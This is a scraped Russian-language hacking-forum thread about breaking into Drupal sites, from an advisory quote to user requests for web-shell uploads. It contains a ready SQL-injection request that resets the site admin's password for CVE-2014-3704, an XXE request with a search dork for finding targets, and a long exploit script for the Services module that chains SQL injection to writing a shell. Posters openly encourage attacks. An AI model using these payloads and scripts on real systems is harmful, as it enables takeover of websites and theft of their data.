ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.11.2013, 22:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от ZeR0ChanNeL
ZeR0ChanNeL said:
drupal 7.15,раскрытие путей
Drupal 7.22 тоже работает, похоже на всю 7 ветку действует.
|
|
|
|
09.12.2013, 19:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
70690
Репутация:
-5
|
|
подскажите как залить шелл в вот эту версию Drupal 6.22
доступ админки есть
стандартные способы не помогли
|
|
|
|
16.10.2014, 16:21
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability
lol
https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
Код:
Code:
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: Drupal - pre-auth SQL Injection Vulnerability
Release Date: 2014/10/15
Last Modified: 2014/10/15
Author: Stefan Horst [stefan.horst[at]sektioneins.de]
Application: Drupal >= 7.0 $data) {
$new_keys = array();
foreach ($data as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
// a duplicate key. We do not account for that as the calling code
// is already broken if that happens.
$new_keys[$key . '_' . $i] = $value;
}
// Update the query with the new placeholders.
// preg_replace is necessary to ensure the replacement does not affect
// placeholders that start with the same exact text. For example, if the
// query contains the placeholders :foo and :foobar, and :foo has an
// array of values, using str_replace would affect both placeholders,
// but using the following preg_replace would only affect :foo because
// it is followed by a non-word character.
$query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
// Update the args array with the new placeholders.
unset($args[$key]);
$args += $new_keys;
$modified = TRUE;
}
return $modified;
}
The function assumes that it is called with an array which has no keys. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));
Which results in this SQL Statement
SELECT * from users where name IN (:name_0, :name_1)
with the parameters name_0 = user1 and name_1 = user2.
The Problem occurs, if the array has keys, which are no integers. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));
this results in an exploitable SQL query:
SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1
with parameters :name_test = user2.
Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
be used to insert arbitrary data in the database, dump or modify existing data
or drop the whole database.
With the possibility to INSERT arbitrary data into the database an
attacker can execute any PHP code through Drupal features with callbacks.
Patch:
$new_keys = array();
foreach (array_values($data) as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
// a duplicate key. We do not account for that as the calling code
// is already broken if that happens.
$new_keys[$key . '_' . $i] = $value;
}
Proof of Concept:
SektionEins GmbH has developed a proof of concept, but was asked by
Drupal to postpone the release.
Disclosure Timeline:
16. Sep. 2014 - Notified the Drupal devs via security contact form
15. Okt. 2014 - Relase of Bugfix by Drupal core Developers
poc:
Код:
Code:
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
и работает ведь
вперед хэкеры
exploit:
http://pastebin.com/nDwLFV3v
video: http://www.youtube.com/watch?v=rHwJYD_yTlM
|
|
|
16.01.2015, 11:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
|
|
|
|
20.03.2015, 18:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Open redirect и обход авторизации. В плане эксплуатации имеются серьезные ограничения.
https://www.drupal.org/SA-CORE-2015-001
Байпас (modules/user/user.module)
До
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]user_pass_rehash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
После
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]user_pass_rehash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// Backwards compatibility: Try to determine a $uid if one was not passed.
// (Since $uid is a required parameter to this function, a PHP warning will
// be generated if it's not provided, which is an indication that the calling
// code should be updated. But the code below will try to generate a correct
// hash in the meantime.)
[/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"]= array();
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db_query_range[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#FF8000"]// If exactly one user account matches the provided password and login
// timestamp, proceed with that $uid.
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$uids[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// Otherwise there is no safe hash to return, so return a random string
// that will never be treated as a valid token.
[/COLOR][COLOR="#007700"]else {
return[/COLOR][COLOR="#0000BB"]drupal_random_key[/COLOR][COLOR="#007700"]();
}
}
return[/COLOR][COLOR="#0000BB"]drupal_hmac_base64[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$timestamp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$uid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]drupal_get_private_key[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
ORed (includes/bootstrap.inc)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// Sanitize the destination parameter (which is often used for redirects)
// to prevent open redirect attacks leading to other domains. Sanitize
// both $_GET['destination'] and $_REQUEST['destination'] to protect code
// that relies on either, but do not sanitize $_POST to avoid interfering
// with unrelated form submissions. $_REQUEST['edit']['destination'] is
// also sanitized since drupal_goto() will sometimes rely on it, and
// other code might therefore use it too. The sanitization happens here
// because menu_path_is_external() requires the variable system to be
// available.
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) || isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) || isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {
require_once[/COLOR][COLOR="#DD0000"]'./includes/menu.inc'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]drupal_load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'filter'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// If the destination is an external URL, remove it.
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]menu_path_is_external[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {
unset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);
unset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);
}
[/COLOR][COLOR="#FF8000"]// If there's still something in $_REQUEST['destination'] that didn't
// come from $_GET, check it too.
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) && (!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) ||[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]menu_path_is_external[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {
unset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);
}
[/COLOR][COLOR="#FF8000"]// Check $_REQUEST['edit']['destination'] separately.
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]menu_path_is_external[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]])) {
unset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'destination'[/COLOR][COLOR="#007700"]]);
}
}[/COLOR][/COLOR]
|
|
|
|
27.04.2015, 16:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside
Подробное описание (PDF): http://www.synacktiv.fr/ressources/s...e_services.pdf
Код:
Code:
POST /drupal7.28/?q=test/node HTTP/1.1
[...]
%evil;
]>
test
ДОРК: "inurl:sites/all/modules/services/servers/rest_server/" |
|
|
|
01.12.2015, 19:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
7480
Репутация:
0
|
|
Кто подскажет насчет 7,37 версии? может у когото есть сплоит?
|
|
|
|
01.11.2016, 12:36
|
|
Новичок
Регистрация: 07.09.2009
Сообщений: 1
Провел на форуме:
5451
Репутация:
0
|
|
6.36 есть чем ковырнуть ?
|
|
|
|
10.02.2017, 00:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Всем привет
drupal 6.20. Аккаунт с правами администратора
Стандартные способы заливки шелла не помогают Кто что ещё подскажет?Что пробовала
1) В модулях включила PHP filter
2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page.
А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом
3) Темы загружать не могу
4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается
Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html.
5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess.
В общем, не знаю, что ещё делать
Кто что подскажет?
|
|
|
|
09.03.2017, 22:24
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE
Уязвимость
Одной из особенностей модуля является то, что можно управлять форматом ввода / вывода, изменяя заголовки Content-Type / Accept. По умолчанию разрешены следующие форматы ввода:
Application / xml
Application / json
Multipart / form-data
Application / vnd.php.serialized
Код:
Code:
POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1
Host: vmweb.lan
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 45
Connection: close
a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}
Код:
Code:
HTTP/1.1 200 OK
Date: Thu, 02 Mar 2017 14:29:54 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Vary: Accept
Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly
Content-Length: 635
Connection: close
Content-Type: application/json
{"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"admin@vmweb.lan","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"admin@vmweb.lan","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}}
Exploit:
PHP код:
PHP:
[COLOR="#000000"]#!/usr/bin/php
[COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'dixuSOspsOUU.php'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''
[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$endpoint_path[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]# Stage 1: SQL Injection
[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]DatabaseCondition
[/COLOR][COLOR="#007700"]{
protected[/COLOR][COLOR="#0000BB"]$conditions[/COLOR][COLOR="#007700"]= [
[/COLOR][COLOR="#DD0000"]"#conjunction"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"AND"
[/COLOR][COLOR="#007700"]];
protected[/COLOR][COLOR="#0000BB"]$arguments[/COLOR][COLOR="#007700"]= [];
protected[/COLOR][COLOR="#0000BB"]$changed[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$queryPlaceholderIdentifier[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
public[/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"];
if(!isset([/COLOR][COLOR="#0000BB"]$stringVersion[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]changed[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]stringVersion[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
}
}
}
class[/COLOR][COLOR="#0000BB"]SelectQueryExtender[/COLOR][COLOR="#007700"]{
[/COLOR][COLOR="#FF8000"]# Contains a DatabaseCondition object instead of a SelectQueryInterface
# so that $query->compile() exists and (string) $query is controlled by us.
[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$uniqueIdentifier[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]QID[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$connection[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$placeholder[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]DatabaseCondition[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
[/COLOR][COLOR="#0000BB"]$cache_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"services:[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#DD0000"]:resources"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql_cache[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT data FROM {cache} WHERE cid='[/COLOR][COLOR="#0000BB"]$cache_id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$password_hash[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#DD0000"]"0x3a) UNION SELECT ux.uid AS uid, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.name AS name, '[/COLOR][COLOR="#0000BB"]$password_hash[/COLOR][COLOR="#DD0000"]' AS pass, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.mail AS mail, ux.theme AS theme, ([/COLOR][COLOR="#0000BB"]$sql_cache[/COLOR][COLOR="#DD0000"]) AS signature, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.pass AS signature_format, ux.created AS created, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.access AS access, ux.login AS login, ux.status AS status, "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"ux.timezone AS timezone, ux.language AS language, ux.picture "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"AS picture, ux.init AS init, ux.data AS data FROM {users} ux "[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"WHERE ux.uid<>(0"
[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]SelectQueryExtender[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]= [[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'ouvreboite'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_PHP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]# If this worked, the rest will as well
[/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]print_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Failed to login with fake password"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]# Store session and user data
[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"]= [
[/COLOR][COLOR="#DD0000"]'session_name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session_name[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'session_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sessid[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'token'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]token
[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'session'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]# Reassign fields
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature_format[/COLOR][COLOR="#007700"];
unset([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature[/COLOR][COLOR="#007700"]);
unset([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]signature_format[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Unable to obtains endpoint's cache value"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Cache contains "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" entries"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]# Stage 2: Change endpoint's behaviour to write a shell
[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]DrupalCacheArray
[/COLOR][COLOR="#007700"]{
[/COLOR][COLOR="#FF8000"]# Cache ID
[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"services:endpoint_name:resources"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]# Name of the table to fetch data from.
# Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]$bin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'cache'[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$keysToPersist[/COLOR][COLOR="#007700"]= [];
protected[/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"]= [];
